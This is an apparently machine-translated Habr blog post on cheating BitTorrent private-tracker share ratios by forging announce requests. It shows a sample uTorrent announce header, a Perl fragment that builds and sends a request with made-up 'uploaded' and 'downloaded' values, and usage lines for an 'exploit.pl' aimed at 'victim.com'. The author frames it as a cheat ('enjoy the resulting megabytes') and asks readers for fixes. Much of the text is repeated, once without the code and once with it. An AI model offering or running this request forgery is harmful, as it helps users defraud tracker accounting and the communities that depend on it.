Vulnerability in Bittorrent protocol
Before reading the article I would recommend that you familiarize yourself with the basic terms of this technology http://ru.wikipedia.org/wiki/BitTorrent
Knowledge of basic Perl language is also desirable.
Today, the Bittorrent protocol is at its peak of popularity. Hundreds and thousands of terabytes every second rush to the feasts on fiber optic highways and radio channels. Millions of files (torrent) appear on the trackers. What can prevent this?
In this article I want to discuss and show excessive openness and ease of messaging tracker and client bittorrent. It may not be a vulnerability, because There is no real threat to the server and the client, but this can undermine the basis of the network and dramatically reduce the overall rate of return. It's no secret that the ratio of the tracker's user activity is an indicator. The less it is, the more restrictions are imposed on the user. Very low ratio can serve as account deletion. This is especially true in networks using NAT, because Upload is scanty. Let's try to delve into the client-server messaging mechanism and try to increase the ratio.
')
Actually, I want to start the description by parsing the HTTP header of most Bittorrent clients (for detailed description, refer to the relevant documentation):
As you can see, all key parameters are transmitted in clear text and this can be used. Substituting the parameters into the header (everyone can realize the variables in their own way, whether it be a console or a GUI) and transfer it to the Socket tracker that was previously opened with the tracker by converting the file hash to an understandable tracker:
Check the profile and enjoy the resulting megabytes :)
Example of use:
perl exploit.pl <info_hash>
perl exploit.pl victim.com 80 1ea9a2766ce3323b3985fddf4a4d11fb 10551598080 0 7E4067D35AE85FF20BFB9D08DCA0E688980CEFB8
This article is written for reference only and the use of this material may lead to the deletion of your account.
I would like to hear an opinion on this issue and of course the ways to solve it. I know of some anti-cheat tricks, but it seems to me they are not very effective.
Popovodu design does not kick much because Habraviki closed.
Related links:
http://www.securitylab.ru/news/301042.php
http://ru.wikipedia.org/wiki/BitTorrent
Knowledge of basic Perl language is also desirable.
Today, the Bittorrent protocol is at its peak of popularity. Hundreds and thousands of terabytes every second rush to the feasts on fiber optic highways and radio channels. Millions of files (torrent) appear on the trackers. What can prevent this?
In this article I want to discuss and show excessive openness and ease of messaging tracker and client bittorrent. It may not be a vulnerability, because There is no real threat to the server and the client, but this can undermine the basis of the network and dramatically reduce the overall rate of return. It's no secret that the ratio of the tracker's user activity is an indicator. The less it is, the more restrictions are imposed on the user. Very low ratio can serve as account deletion. This is especially true in networks using NAT, because Upload is scanty. Let's try to delve into the client-server messaging mechanism and try to increase the ratio.
')
Actually, I want to start the description by parsing the HTTP header of most Bittorrent clients (for detailed description, refer to the relevant documentation):
GET announce.php?info_hash=%8bz%0d%9b%93%ac%7d%d0%90%60r%03%1b%2b%89%60p%08%96%2e&peer_id=-UT1600-%da%81%bc%ce4%9c%a0%c1k%81%a7%f9&port=6881&uploaded=35302368&downloaded=54454366434&left=177313792&key=F53CB1E7&numwant=200&compact=1&no_peer_id=1 HTTP/1.1
Host: myhost.com
User-Agent: uTorrent/1600
Accept-Encoding: gzip
Connection: Close
As you can see, all key parameters are transmitted in clear text and this can be used. Substituting the parameters into the header (everyone can realize the variables in their own way, whether it be a console or a GUI) and transfer it to the Socket tracker that was previously opened with the tracker by converting the file hash to an understandable tracker:
my @r = $info_hash =~ /(.{1,2})/g;
$info = join('%',@r);
$info_hash = "%" . $info;
my $request = "";
$request .= "GET /announce.php?passkey=$passkey&info_hash=$info_hash&peer_id=-UT1750-%fa%91%a4IE%22ys%fb%3cCc&port=6881&uploaded=$uploaded&downloaded=$downloaded&left=1037668352&key=E4DC5ED5&event=started&numwant=200&compact=1&no_peer_id=1 HTTP/1.1\r\n";
$request .= "Host: $host:$port\r\n";
$request .= "User-Agent: uTorrent/1750\r\n";
$request .= "Accept-Encoding: gzip\r\n";
$request .= "Connection: Close\r\n\r\n";
print $sock $request;
print $sock $request;
Check the profile and enjoy the resulting megabytes :)
Example of use:
perl exploit.pl <info_hash>
perl exploit.pl victim.com 80 1ea9a2766ce3323b3985fddf4a4d11fb 10551598080 0 7E4067D35AE85FF20BFB9D08DCA0E688980CEFB8
This article is written for reference only and the use of this material may lead to the deletion of your account.
I would like to hear an opinion on this issue and of course the ways to solve it. I know of some anti-cheat tricks, but it seems to me they are not very effective.
Popovodu design does not kick much because Habraviki closed.
Related links:
http://www.securitylab.ru/news/301042.php
http://ru.wikipedia.org/wiki/BitTorrent
Source: https://habr.com/ru/post/20271/
All Articles